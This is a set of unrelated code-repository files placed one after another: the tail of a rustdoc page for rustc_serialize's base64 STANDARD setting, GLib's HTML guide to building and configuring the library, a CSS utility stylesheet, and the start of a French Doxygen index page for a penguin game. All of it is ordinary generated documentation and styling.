static"> <h1 class='fqn'><span class='in-band'>Static <a href='../index.html'>rustc_serialize</a>::<wbr><a href='index.html'>base64</a>::<wbr><a class='static' href=''>STANDARD</a></span><span class='out-of-band'><span id='render-detail'> <a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs"> [<span class='inner'>&#x2212;</span>] </a> </span><a id='src-4981' class='srclink' href='../../src/rustc_serialize/base64.rs.html#53-54' title='goto source code'>[src]</a></span></h1> <pre class='rust static'>pub static STANDARD: <a class='struct' href='../../rustc_serialize/base64/struct.Config.html' title='rustc_serialize::base64::Config'>Config</a><code> = </code><code>Config{char_set: Standard, newline: Newline::CRLF, pad: true, line_length: None,}</code></pre><div class='docblock'><p>Configuration for RFC 4648 standard base64 encoding</p> </div></section> <section id='search' class="content hidden"></section> <section class="footer"></section> <aside id="help" class="hidden"> <div> <h1 class="hidden">Help</h1> <div class="shortcuts"> <h2>Keyboard Shortcuts</h2> <dl> <dt>?</dt> <dd>Show this help dialog</dd> <dt>S</dt> <dd>Focus the search field</dd> <dt>&larrb;</dt> <dd>Move up in search results</dd> <dt>&rarrb;</dt> <dd>Move down in search results</dd> <dt>&#9166;</dt> <dd>Go to active search result</dd> <dt>+</dt> <dd>Collapse/expand all sections</dd> </dl> </div> <div class="infos"> <h2>Search Tricks</h2> <p> Prefix searches with a type followed by a colon (e.g. <code>fn:</code>) to restrict the search to a given type. </p> <p> Accepted types are: <code>fn</code>, <code>mod</code>, <code>struct</code>, <code>enum</code>, <code>trait</code>, <code>type</code>, <code>macro</code>, and <code>const</code>. </p> <p> Search functions by type signature (e.g. <code>vec -> usize</code> or <code>* -> vec</code>) </p> </div> </div> </aside> <script> window.rootPath = "../../"; window.currentCrate = "rustc_serialize"; window.playgroundUrl = ""; </script> <script src="../../jquery.js"></script> <script src="../../main.js"></script> <script defer src="../../search-index.js"></script> </body> </html>
usr/glib/share/gtk-doc/html/glib/glib-building.html
tdkonsta/test
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Compiling the GLib package</title> <meta name="generator" content="DocBook XSL Stylesheets V1.73.2"> <link rel="start" href="index.html" title="GLib Reference Manual"> <link rel="up" href="glib.html" title="GLib Overview"> <link rel="prev" href="glib.html" title="GLib Overview"> <link rel="next" href="glib-cross-compiling.html" title="Cross-compiling the GLib package"> <meta name="generator" content="GTK-Doc V1.9 (XML mode)"> <link rel="stylesheet" href="style.css" type="text/css"> <link rel="chapter" href="glib.html" title="GLib Overview"> <link rel="chapter" href="glib-fundamentals.html" title="GLib Fundamentals"> <link rel="chapter" href="glib-core.html" title="GLib Core Application Support"> <link rel="chapter" href="glib-utilities.html" title="GLib Utilities"> <link rel="chapter" href="glib-data-types.html" title="GLib Data Types"> <link rel="chapter" href="tools.html" title="GLib Tools"> <link rel="index" href="ix01.html" title="Index"> <link rel="index" href="ix02.html" title="Index of deprecated symbols"> <link rel="index" href="ix03.html" title="Index of new symbols in 2.2"> <link rel="index" href="ix04.html" title="Index of new symbols in 2.4"> <link rel="index" href="ix05.html" title="Index of new symbols in 2.6"> <link rel="index" href="ix06.html" title="Index of new symbols in 2.8"> <link rel="index" href="ix07.html" title="Index of new symbols in 2.10"> <link rel="index" href="ix08.html" title="Index of new symbols in 2.12"> <link rel="index" href="ix09.html" title="Index of new symbols in 2.14"> <link rel="index" href="ix10.html" title="Index of new symbols in 2.16"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table class="navigation" id="top" width="100%" summary="Navigation header" cellpadding="2" cellspacing="2"><tr valign="middle"> <td><a accesskey="p" href="glib.html"><img src="left.png" width="24" height="24" border="0" alt="Prev"></a></td> <td><a accesskey="u" href="glib.html"><img src="up.png" width="24" height="24" border="0" alt="Up"></a></td> <td><a accesskey="h" href="index.html"><img src="home.png" width="24" height="24" border="0" alt="Home"></a></td> <th width="100%" align="center">GLib Reference Manual</th> <td><a accesskey="n" href="glib-cross-compiling.html"><img src="right.png" width="24" height="24" border="0" alt="Next"></a></td> </tr></table> <div class="refentry" lang="en"> <a name="glib-building"></a><div class="titlepage"></div> <div class="refnamediv"><table width="100%"><tr> <td valign="top"> <h2><span class="refentrytitle">Compiling the GLib package</span></h2> <p>Compiling the GLib Package &#8212; How to compile GLib itself </p> </td> <td valign="top" align="right"></td> </tr></table></div> <div class="refsect1" lang="en"> <a name="building"></a><h2>Building the Library on UNIX</h2> <p> On UNIX, GLib uses the standard GNU build system, using <span class="application">autoconf</span> for package configuration and resolving portability issues, <span class="application">automake</span> for building makefiles that comply with the GNU Coding Standards, and <span class="application">libtool</span> for building shared libraries on multiple platforms. The normal sequence for compiling and installing the GLib library is thus: </p> <div class="literallayout"><p><br> &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;<strong class="userinput"><code>./configure</code></strong><br> &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;<strong class="userinput"><code>make</code></strong><br> &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;<strong class="userinput"><code>make&#160;install</code></strong><br> &#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;</p></div> <p> </p> <p> The standard options provided by <span class="application">GNU autoconf</span> may be passed to the <span class="command"><strong>configure</strong></span> script. Please see the <span class="application">autoconf</span> documentation or run <span class="command"><strong>./configure --help</strong></span> for information about the standard options. </p> <p> The GTK+ documentation contains <a class="ulink" href="/usr/share/gtk-doc/html/gtk/gtk-building.html" target="_top">further details</a> about the build process and ways to influence it. </p> </div> <div class="refsect1" lang="en"> <a name="dependencies"></a><h2>Dependencies</h2> <p> Before you can compile the GLib library, you need to have various other tools and libraries installed on your system. The two tools needed during the build process (as differentiated from the tools used in when creating GLib mentioned above such as <span class="application">autoconf</span>) are <span class="command"><strong>pkg-config</strong></span> and GNU make. </p> <div class="itemizedlist"><ul type="disc"> <li><p> <a class="ulink" href="http://www.freedesktop.org/software/pkgconfig/" target="_top">pkg-config</a> is a tool for tracking the compilation flags needed for libraries that are used by the GLib library. (For each library, a small <code class="literal">.pc</code> text file is installed in a standard location that contains the compilation flags needed for that library along with version number information.) The version of <span class="command"><strong>pkg-config</strong></span> needed to build GLib is mirrored in the <code class="filename">dependencies</code> directory on the <a class="ulink" href="ftp://ftp.gtk.org/pub/gtk/v2.2/" target="_top">GTK+ FTP site.</a> </p></li> <li><p> The GTK+ makefiles will mostly work with different versions of <span class="command"><strong>make</strong></span>, however, there tends to be a few incompatibilities, so the GTK+ team recommends installing <a class="ulink" href="http://www.gnu.org/software/make" target="_top">GNU make</a> if you don't already have it on your system and using it. (It may be called <span class="command"><strong>gmake</strong></span> rather than <span class="command"><strong>make</strong></span>.) </p></li> </ul></div> <p> GLib depends on a number of other libraries. </p> <div class="itemizedlist"><ul type="disc"> <li> <p> The <a class="ulink" href="http://www.gnu.org/software/libiconv/" target="_top">GNU libiconv library</a> is needed to build GLib if your system doesn't have the <code class="function">iconv()</code> function for doing conversion between character encodings. Most modern systems should have <code class="function">iconv()</code>, however many older systems lack an <code class="function">iconv()</code> implementation. On such systems, you must install the libiconv library. This can be found at: <a class="ulink" href="http://www.gnu.org/software/libiconv" target="_top">http://www.gnu.org/software/libiconv</a>. </p> <p> If your system has an <code class="function">iconv()</code> implementation but you want to use libiconv instead, you can pass the --with-libiconv option to configure. This forces libiconv to be used. </p> <p> Note that if you have libiconv installed in your default include search path (for instance, in <code class="filename">/usr/local/</code>), but don't enable it, you will get an error while compiling GLib because the <code class="filename">iconv.h</code> that libiconv installs hides the system iconv. </p> <p> If you are using the native iconv implementation on Solaris instead of libiconv, you'll need to make sure that you have the converters between locale encodings and UTF-8 installed. At a minimum you'll need the SUNWuiu8 package. You probably should also install the SUNWciu8, SUNWhiu8, SUNWjiu8, and SUNWkiu8 packages. </p> <p> The native iconv on Compaq Tru64 doesn't contain support for UTF-8, so you'll need to use GNU libiconv instead. (When using GNU libiconv for GLib, you'll need to use GNU libiconv for GNU gettext as well.) This probably applies to related operating systems as well. </p> </li> <li><p> The libintl library from the <a class="ulink" href="http://www.gnu.org/software/gettext" target="_top">GNU gettext package</a> is needed if your system doesn't have the <code class="function">gettext()</code> functionality for handling message translation databases. </p></li> <li><p> A thread implementation is needed, unless you want to compile GLib without thread support, which is not recommended. The thread support in GLib can be based upon several native thread implementations, e.g. POSIX threads, DCE threads or Solaris threads. </p></li> <li><p> GRegex uses the <a class="ulink" href="http://www.pcre.org/" target="_top">PCRE library</a> for regular expression matching. The default is to use the internal version of PCRE that is patched to use GLib for memory management and Unicode handling. If you prefer to use the system-supplied PCRE library you can pass the --with-pcre=system option to configure, but it is not recommended. </p></li> <li><p> The optional extended attribute support in GIO requires the getxattr() family of functions that may be provided by glibc or by the standalone libattr library. To build GLib without extended attribute support, use the <code class="option">--disable-xattr</code> configure option. </p></li> <li><p> The optional SELinux support in GIO requires libselinux. To build GLib without SELinux support, use the <code class="option">--disable-selinux</code> configure option. </p></li> </ul></div> </div> <div class="refsect1" lang="en"> <a name="extra-configuration-options"></a><h2>Extra Configuration Options</h2> <p> In addition to the normal options, the <span class="command"><strong>configure</strong></span> script in the GLib library supports these additional arguments: </p> <div class="cmdsynopsis"><p><code class="command">configure</code> [[--enable-debug=[no|minimum|yes]]] [[--disable-gc-friendly] | [--enable-gc-friendly]] [[--disable-mem-pools] | [--enable-mem-pools]] [[--disable-threads] | [--enable-threads]] [[--with-threads=[none|posix|dce|win32]]] [[--disable-regex] | [--enable-regex]] [[--with-pcre=[internal|system]]] [[--disable-included-printf] | [--enable-included-printf]] [[--disable-visibility] | [--enable-visibility]] [[--disable-gtk-doc] | [--enable-gtk-doc]] [[--disable-man] | [--enable-man]] [[--disable-xattr] | [--enable-xattr]] [[--disable-selinux] | [--enable-selinux]]</p></div> <p> </p> <p><b><code class="systemitem">--enable-debug</code>.&#160;</b> Turns on various amounts of debugging support. Setting this to 'no' disables g_assert(), g_return_if_fail(), g_return_val_if_fail() and all cast checks between different object types. Setting it to 'minimum' disables only cast checks. Setting it to 'yes' enables runtime debugging. The default is 'minimum'. Note that 'no' is fast, but dangerous as it tends to destabilize even mostly bug-free software by changing the effect of many bugs from simple warnings into fatal crashes. Thus <code class="option">--enable-debug=no</code> should <span class="emphasis"><em>not</em></span> be used for stable releases of GLib. </p> <p><b><code class="systemitem">--disable-gc-friendly</code> and <code class="systemitem">--enable-gc-friendly</code>.&#160;</b> By default, and with <code class="systemitem">--disable-gc-friendly</code> as well, Glib does not clear the memory for certain objects before they are freed. For example, Glib may decide to recycle GList nodes by putting them in a free list. However, memory profiling and debugging tools like <a class="ulink" href="http://www.valgrind.org" target="_top">Valgrind</a> work better if an application does not keep dangling pointers to freed memory (even though these pointers are no longer dereferenced), or invalid pointers inside uninitialized memory. The <code class="systemitem">--enable-gc-friendly</code> option makes Glib clear memory in these situations: </p> <div class="itemizedlist"><ul type="disc"> <li><p> When shrinking a GArray, Glib will clear the memory no longer available in the array: shrink an array from 10 bytes to 7, and the last 3 bytes will be cleared. This includes removals of single and multiple elements. </p></li> <li><p> </p></li> <li><p> When growing a GArray, Glib will clear the new chunk of memory. Grow an array from 7 bytes to 10 bytes, and the last 3 bytes will be cleared. </p></li> <li><p> The above applies to GPtrArray as well. </p></li> <li><p> When freeing a node from a GHashTable, Glib will first clear the node, which used to have pointers to the key and the value stored at that node. </p></li> <li><p> When destroying or removing a GTree node, Glib will clear the node, which used to have pointers to the node's value, and the left and right subnodes. </p></li> </ul></div> <p> Since clearing the memory has a cost, <code class="systemitem">--disable-gc-friendly</code> is the default. </p> <p><b><code class="systemitem">--disable-mem-pools</code> and <code class="systemitem">--enable-mem-pools</code>.&#160;</b> Many small chunks of memory are often allocated via collective pools in GLib and are cached after release to speed up reallocations. For sparse memory systems this behaviour is often inferior, so memory pools can be disabled to avoid excessive caching and force atomic maintenance of chunks through the <code class="function">g_malloc()</code> and <code class="function">g_free()</code> functions. Code currently affected by this: </p> <div class="itemizedlist"><ul type="disc"> <li><p> <span class="structname">GList</span>, <span class="structname">GSList</span>, <span class="structname">GNode</span>, <span class="structname">GHash</span> allocations. The functions g_list_push_allocator(), g_list_pop_allocator(), g_slist_push_allocator(), g_slist_pop_allocator(), g_node_push_allocator() and g_node_pop_allocator() are not available </p></li> <li><p> <span class="structname">GMemChunk</span>s become basically non-effective </p></li> <li><p> <span class="structname">GSignal</span> disables all caching (potentially very slow) </p></li> <li><p> <span class="structname">GType</span> doesn't honour the <span class="structname">GTypeInfo</span> <em class="structfield"><code>n_preallocs</code></em> field anymore </p></li> <li><p> the <span class="structname">GBSearchArray</span> flag <code class="literal">G_BSEARCH_ALIGN_POWER2</code> becomes non-functional </p></li> </ul></div> <p> </p> <p><b><code class="systemitem">--disable-threads</code> and <code class="systemitem">--enable-threads</code>.&#160;</b> Do not compile GLib to be multi thread safe. GLib will be slightly faster then. This is however not recommended, as many programs rely on GLib being multi thread safe. </p> <p><b><code class="systemitem">--with-threads</code>.&#160;</b> Specify a thread implementation to use. </p> <div class="itemizedlist"><ul type="disc"> <li><p> 'posix' and 'dce' can be used interchangeable to mean the different versions of Posix threads. configure tries to find out, which one is installed. </p></li> <li><p> 'none' means that GLib will be thread safe, but does not have a default thread implementation. This has to be supplied to <code class="function">g_thread_init()</code> by the programmer. </p></li> </ul></div> <p> </p> <p><b><code class="systemitem">--disable-regex</code> and <code class="systemitem">--enable-regex</code>.&#160;</b> Do not compile GLib with regular expression support. GLib will be smaller because it will not need the PCRE library. This is however not recommended, as programs may need GRegex. </p> <p><b><code class="systemitem">--with-pcre</code>.&#160;</b> Specify whether to use the internal or the system-supplied PCRE library. </p> <div class="itemizedlist"><ul type="disc"> <li><p> 'internal' means that GRegex will be compiled to use the internal PCRE library. </p></li> <li><p> 'system' means that GRegex will be compiled to use the system-supplied PCRE library. </p></li> </ul></div> <p> Using the internal PCRE is the preferred solution: </p> <div class="itemizedlist"><ul type="disc"> <li><p> System-supplied PCRE has a separated copy of the big tables used for Unicode handling. </p></li> <li><p> Some systems have PCRE libraries compiled without some needed features, such as UTF-8 and Unicode support. </p></li> <li><p> PCRE uses some global variables for memory management and other features. In the rare case of a program using both GRegex and PCRE (maybe indirectly through a library), this variables could lead to problems when they are modified. </p></li> </ul></div> <p> </p> <p><b><code class="systemitem">--disable-included-printf</code> and <code class="systemitem">--enable-included-printf</code>.&#160;</b> By default the <span class="command"><strong>configure</strong></span> script will try to auto-detect whether the C library provides a suitable set of <code class="function">printf()</code> functions. In detail, <span class="command"><strong>configure</strong></span> checks that the semantics of <code class="function">snprintf()</code> are as specified by C99 and that positional parameters as specified in the Single Unix Specification are supported. If this not the case, GLib will include an implementation of the <code class="function">printf()</code> family. These options can be used to explicitly control whether an implementation fo the <code class="function">printf()</code> family should be included or not. </p> <p><b><code class="systemitem">--disable-visibility</code> and <code class="systemitem">--enable-visibility</code>.&#160;</b> By default, GLib uses ELF visibility attributes to optimize PLT table entries if the compiler supports ELF visibility attributes. A side-effect of the way in which this is currently implemented is that any header change forces a full recompilation, and missing includes may go unnoticed. Therefore, it makes sense to turn this feature off while doing GLib development, even if the compiler supports ELF visibility attributes. The <code class="option">--disable-visibility</code> option allows to do that. </p> <p><b><code class="systemitem">--disable-gtk-doc</code> and <code class="systemitem">--enable-gtk-doc</code>.&#160;</b> By default the <span class="command"><strong>configure</strong></span> script will try to auto-detect whether the <span class="application">gtk-doc</span> package is installed. If it is, then it will use it to extract and build the documentation for the GLib library. These options can be used to explicitly control whether <span class="application">gtk-doc</span> should be used or not. If it is not used, the distributed, pre-generated HTML files will be installed instead of building them on your machine. </p> <p><b><code class="systemitem">--disable-man</code> and <code class="systemitem">--enable-man</code>.&#160;</b> By default the <span class="command"><strong>configure</strong></span> script will try to auto-detect whether <span class="application">xsltproc</span> and the necessary Docbook stylesheets are installed. If they are, then it will use them to rebuild the included man pages from the XML sources. These options can be used to explicitly control whether man pages should be rebuilt used or not. The distribution includes pre-generated man pages. </p> <p><b><code class="systemitem">--disable-xattr</code> and <code class="systemitem">--enable-xattr</code>.&#160;</b> By default the <span class="command"><strong>configure</strong></span> script will try to auto-detect whether the getxattr() family of functions is available. If it is, then extended attribute support will be included in GIO. These options can be used to explicitly control whether extended attribute support should be included or not. getxattr() and friends can be provided by glibc or by the standalone libattr library. </p> <p><b><code class="systemitem">--disable-selinux</code> and <code class="systemitem">--enable-selinux</code>.&#160;</b> By default the <span class="command"><strong>configure</strong></span> script will auto-detect if libselinux is available and include SELinux support in GIO if it is. These options can be used to explicitly control whether SELinxu support should be included. </p> </div> </div> </body> </html>
static/css/site.css
lantianlz/qiexing
body { padding-top: 0px; font-family: "Helvetica Neue",Helvetica,"Lucida Grande","Luxi Sans",Arial,"Hiragino Sans GB",STHeiti,"Microsoft YaHei","Wenquanyi Micro Hei","WenQuanYi Micro Hei Mono","WenQuanYi Zen Hei","WenQuanYi Zen Hei Mono",LiGothicMed; font-size: 14px; color: #222; } .no-underline{text-decoration: none;} .no-underline:hover{text-decoration: none;} .hidden{visibility:hidden} .auto-hide{display: none;} .none{display:none} .block{display:block;} .pointer{cursor: pointer;} .fb{font-weight: bold;} .f12{font-size: 12px;} .f13{font-size: 13px;} .f14{font-size: 14px;} .f15{font-size: 15px;} .f16{font-size: 16px;} .f17{font-size: 17px;} .f18{font-size: 18px;} .f19{font-size: 19px;} .f20{font-size: 20px;} .f30{font-size: 30px;} .f40{font-size: 40px;} .line-height-25{line-height: 25px;} .line-height-32{line-height: 32px;} .co1{color: #222;} .co2{color: #9fa3a7;} .co3{color: #fff;} .co4{color: #999;} .co5{color: #f36119;} .co6{color: #9FA3A7;} .co7{color: #666666;} .co8{color: red;} .co9{color: #428bca;} .co10{color: #eee}; .mr-0{margin-right: 0;} .mr-10{margin-right: 10px;} .ml-0{margin-left: 0;} .ml-5{margin-left: 5px;} .ml-10{margin-left: 10px;} .mt--2{margin-top: -2px;} .mt-5{margin-top: 5px;} .mt-15{margin-top: 15px;} .mt-20{margin-top: 20px;} .mt-25{margin-top: 25px;} .mb-15{margin-bottom: 15px;} .pt-0{padding-top: 0;} .pt-2{padding-top: 2px;} .pt-3{padding-top: 3px;} .pt-5{padding-top: 5px;} .pt-10{padding-top: 10px;} .pt-15{padding-top: 15px;} .pt-20{padding-top: 20px;} .pt-25{padding-top: 25px;} .pt-30{padding-top: 30px;} .pt-50{padding-top: 50px;} .pt-55{padding-top: 55px;} .pl-0{padding-left: 0;} .pl-3{padding-left: 3px;} .pl-5{padding-left: 5px;} .pl-10{padding-left: 10px;} .pl-15{padding-left: 15px;} .pl-20{padding-left: 20px;} .pl-25{padding-left: 25px;} .pl-35{padding-left: 35px;} .pl-30{padding-left: 30px;} .pl-40{padding-left: 40px;} .pl-45{padding-left: 45px;} .pl-50{padding-left: 50px;} .pl-60{padding-left: 60px;} .pl-70{padding-left: 70px;} .pl-75{padding-left: 75px;} .pr-0{padding-right: 0;} .pr-3{padding-right: 3px;} .pr-5{padding-right: 5px;} .pr-10{padding-right: 10px;} .pr-15{padding-right: 15px;} .pr-20{padding-right: 20px;} .pr-26{padding-right: 26px;} .pr-30{padding-right: 30px;} .pr-35{padding-right: 35px;} .pr-50{padding-right: 50px;} .pb-2{padding-bottom: 2px;} .pb-3{padding-bottom: 3px;} .pb-5{padding-bottom: 5px;} .pb-10{padding-bottom: 10px;} .pb-15{padding-bottom: 15px;} .pb-20{padding-bottom: 20px;} .pb-30{padding-bottom: 30px;} .bgc-0{background-color: transparent;} .bgc-fff{background-color: #fff;} .bgc-333{background-color: #333;} .bgc-f36119{background-color: #f36119;} .bgc-272829{background-color: #272829;} .bgc-eee{background-color: #eee;} .bgc-e9e9e9{background-color: #e9e9e9;} .w120{width: 120px;} .w200{width: 200px;} .w215{width: 215px;} .w250{width: 250px;} .h215{height: 215px;} .border-1{border: solid 1px;} .border-5{border: solid 5px;} .border-left-0{border-left: 0;} .border-right-0{border-right: 0;} .border-top-0{border-top: 0;} .border-bottom-0{border-bottom: 0;} .border-bottom{border-bottom: solid 1px;} .border-top{border-top: solid 1px;} .border-left{border-left: solid 1px;} .border-left-4{border-left: solid 4px;} .bdc-ebeced{border-color: #ebeced;} .bdc-eee{border-color: #eee;} .bdc-ddd{border-color: #ddd;} .bdc-fff{border-color: #fff;} .bdc-39B2E2{border-color: #39B2E2;} .bdc-E67E22{border-color: #E67E22;} .bdc-f36119{border-color: #f36119;} .pa{position: absolute;} .pr{position: relative;} .pf{position: fixed;} .of-hidden{overflow: hidden;} .h{height: 100%;} .h155{height: 155px;} .h200{height: 200px;} .h225{height: 225px;} .h250{height: 250px;} .w{width: 100%;} .w140{width: 140px;} .w200{width: 200px;} .w270{width: 270px;} .w350{width: 350px;} .min-w500{min-width: 500px;} .avatar-25{ width: 25px; height: 25px; } .avatar-35{ width: 35px; height: 35px; } .avatar-45{ width: 45px; height: 45px; } .avatar-55{ width: 55px; height: 55px; } .avatar-100{ width: 100px; height: 100px; } .qx-info-notice{ background-color: #56A8C7; border-color: #56A8C7; } .qx-success-notice{ background-color: #65B153; border-color: #0FA70D; } .qx-error-notice{ background-color: #C94C42; border-color: #B43A30; } .qx-warning-notice{ background-color: #EEA31F; border-color: #EEA31F; } .border-radius-0{border-radius: 0px;} .border-radius-2{border-radius: 2px;} .border-radius-4{border-radius: 4px;} .box-shadow-224{box-shadow: 2px 2px 4px #666;} .box-shadow-024{box-shadow: 0px 2px 4px #666;} /*间隔*/ .clear {height:0px;clear:both; font-size:0; overflow:hidden;} .blank0 {height:0;clear:both;font-size:0px;overflow:hidden;} .blank1 {height:1px;clear:both;font-size:0px;overflow:hidden;} .blank2 {height:2px;clear:both;font-size:0px;overflow:hidden;} .blank4 {height:4px;clear:both;font-size:0px;overflow:hidden;} .blank5 {height:5px;clear:both;font-size:0px;overflow:hidden;} .blank10 {height:10px;clear:both;font-size:0px;overflow:hidden;} .blank15 {height:15px;clear:both;font-size:0px;overflow:hidden;} .blank20 {height:20px;clear:both;font-size:0px;overflow:hidden;} .blank30 {height:30px;clear:both;font-size:0px;overflow:hidden;} .blank40 {height:40px;clear:both;font-size:0px;overflow:hidden;} /*****************************************************/ .qx-nav>li>a{ padding-left: 35px; padding-right: 35px; font-weight: normal; font-size: 20px; } .qx-nav>li.active>a{ /*background-color: #eee;*/ color: #f36119; } .nav>li>a:hover, .nav>li>a:focus{ background-color: transparent; } .qx-nav>li>a:hover{ color: #f36119; } .article-image{ -webkit-transition: margin 0.1s ease; -moz-transition: margin 0.1s ease; -o-transition: margin 0.1s ease; transition: margin 0.1s ease; display: block; margin: 0 -25% 0; width: 150%; height: 205px; } .list-group-item:first-child{ border-top-right-radius: 0px; border-top-left-radius: 0px; border-top: 0px; } .list-group-item:last-child{ border-bottom-right-radius: 0px; border-bottom-left-radius: 0px; border-bottom: 0px; } .dropdown-menu{min-width: 140px;} .message-menu .badge{ padding: 2px 5px; background-color: #f36119; } .gray-white{ color: #999; } .gray-white:hover{ text-decoration: none; color: #fff; } .white-white{ color: #fff; } .white-white:hover{ color: #fff; } .black-blue{ color: #222; } .black-blue:hover{ text-decoration: none; color: #f36119; } .qx-logo{ font-size: 30px; font-weight: bold; color: #f36119; text-decoration: none; padding-right: 20px; } .qx-logo:hover{ text-decoration: none; } a{color: #3F484F;} a:focus {outline: none;-moz-outline: none;} a:hover{color: #f36119;} a.border-block-blue{ border: solid 1px #9ECEFA; color: #428bca; border-radius: 50px; text-align: center; text-decoration: none; transition: background-color 0.5s, color 0.5s, border-color 0.5s; } a.border-block-blue:hover{ background-color: #428bca; border-color: #428bca; color: white; } a.border-block-blue.active{ background-color: #428bca; border-color: #428bca; color: white; } a.border-block-red{ border: solid 1px #d44137; color: #d44137; border-radius: 50px; text-align: center; text-decoration: none; transition: background-color 0.5s, color 0.5s, border-color 0.5s; } a.border-block-red:hover{ background-color: #d44137; border-color: #d44137; color: white; } a.border-block-red.active{ background-color: #d44137; border-color: #d44137; color: white; } label.error{ color: #863114; font-size: 12px; } .btn-danger{ background-color: #f36119; border-color: #f36119; } .btn-danger:hover{ background-color: #C4490C; border-color: #C4490C; } .placeholder { color: #aaa; } .qx-nav-pills{ border-bottom: 2px solid #d9d9d9; } .qx-nav-pills>li>a{ border-radius: 0px; margin-bottom: -2px; } .qx-nav-pills>li>a:hover{ background-color: transparent; border-bottom: 2px solid #f36119; } .qx-nav-pills>li.active>a:hover{ color: #f36119; background-color: transparent; } .qx-nav-pills>li.active>a{ background-color: transparent; color: #f36119; border-bottom: 2px solid #f36119; } .nav-pills>li.active>a, .nav-pills>li.active>a:hover, .nav-pills>li.active>a:focus{ background-color: transparent; color: #f36119; } .answer-content a{color: #f36119;} .answer-content p{margin: 0;}
UltimatePenguinRampage/doc/html/globals.html
JunkiesCorporation/Ultimate-Penguin-Rampage
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.10"/> <title>Ultimate Penguin Rampage: Membres de fichier</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="search/search.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="search/searchdata.js"></script> <script type="text/javascript" src="search/search.js"></script> <script type="text/javascript"> $(document).ready(function() { init_search(); }); </script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td id="projectalign" style="padding-left: 0.5em;"> <div id="projectname">Ultimate Penguin Rampage &#160;<span id="projectnumber">alpha_0.1</span> </div> <div id="projectbrief">RPG-themed Penguin Hack n&#39; Slash</div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Généré par Doxygen 1.8.10 --> <script type="text/javascript"> var searchBox = new SearchBox("searchBox", "search",false,'Recherche'); </script> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Page&#160;principale</span></a></li> <li><a href="pages.html"><span>Pages&#160;associées</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Fichiers</span></a></li> <li> <div id="MSearchBox" class="MSearchBoxInactive"> <span class="left"> <img id="MSearchSelect" src="search/mag_sel.png" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" alt=""/> <input type="text" id="MSearchField" value="Recherche" accesskey="S" onfocus="searchBox.OnSearchFieldFocus(true)" onblur="searchBox.OnSearchFieldFocus(false)" onkeyup="searchBox.OnSearchFieldChange(event)"/> </span><span class="right"> <a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a> </span> </div> </li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>Liste&#160;des&#160;fichiers</span></a></li> <li class="current"><a href="globals.html"><span>Membres&#160;de&#160;fichier</span></a></li> </ul> </div> <div id="navrow3" class="tabs2"> <ul class="tablist"> <li class="current"><a href="globals.html"><span>Tout</span></a></li> <li><a href="globals_func.html"><span>Fonctions</span></a></li> <li><a href="globals_enum.html"><span>Énumérations</span></a></li> <li><a href="globals_eval.html"><span>Valeurs&#160;énumérées</span></a></li> <li><a href="globals_defs.html"><span>Macros</span></a></li> </ul> </div> </div><!-- top --> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> </div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <div class="contents"> <div class="textblock">Liste de tous les membres de fichier avec des liens vers les fichiers auxquels ils appartiennent :</div><ul> <li>_USE_MATH_DEFINES : <a class="el" href="_entite_8h.html#a525335710b53cb064ca56b936120431e">Entite.h</a> </li> <li>intVersString() : <a class="el" href="_utils_8cpp.html#a79248f0622d834448aed86ae788bc390">Utils.cpp</a> , <a class="el" href="_utils_8h.html#a79248f0622d834448aed86ae788bc390">Utils.h</a> </li> <li>M_PI_8 : <a class="el" href="_entite_8h.html#ade747d04ae8b198fe389b6454f8c7944">Entite.h</a> </li> <li>main() : <a class="el" href="_u_p_r_8cpp.html#a700a0caa5b70a06d1064e576f9f3cf65">UPR.cpp</a> </li> <li>remplacerParEspaces() : <a class="el" href="_utils_8cpp.html#abe19d6af78abe545e1611e79282863cc">Utils.cpp</a> , <a class="el" href="_utils_8h.html#abe19d6af78abe545e1611e79282863cc">Utils.h</a> </li> <li>TILE_SOLIDE : <a class="el" href="_enums_8h.html#ac9e486ec80ccfdb28a4f4837d419c9f1addc150375d49cd9a6fede92f789aa1d4">Enums.h</a> </li> <li>TILE_TRAVERSABLE : <a class="el" href="_enums_8h.html#ac9e486ec80ccfdb28a4f4837d419c9f1a421b09e5b7f8e3bf2dba0a13c2111f12">Enums.h</a> </li> <li>TileType : <a class="el" href="_enums_8h.html#ac9e486ec80ccfdb28a4f4837d419c9f1">Enums.h</a> </li> </ul> </div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Généré par &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" 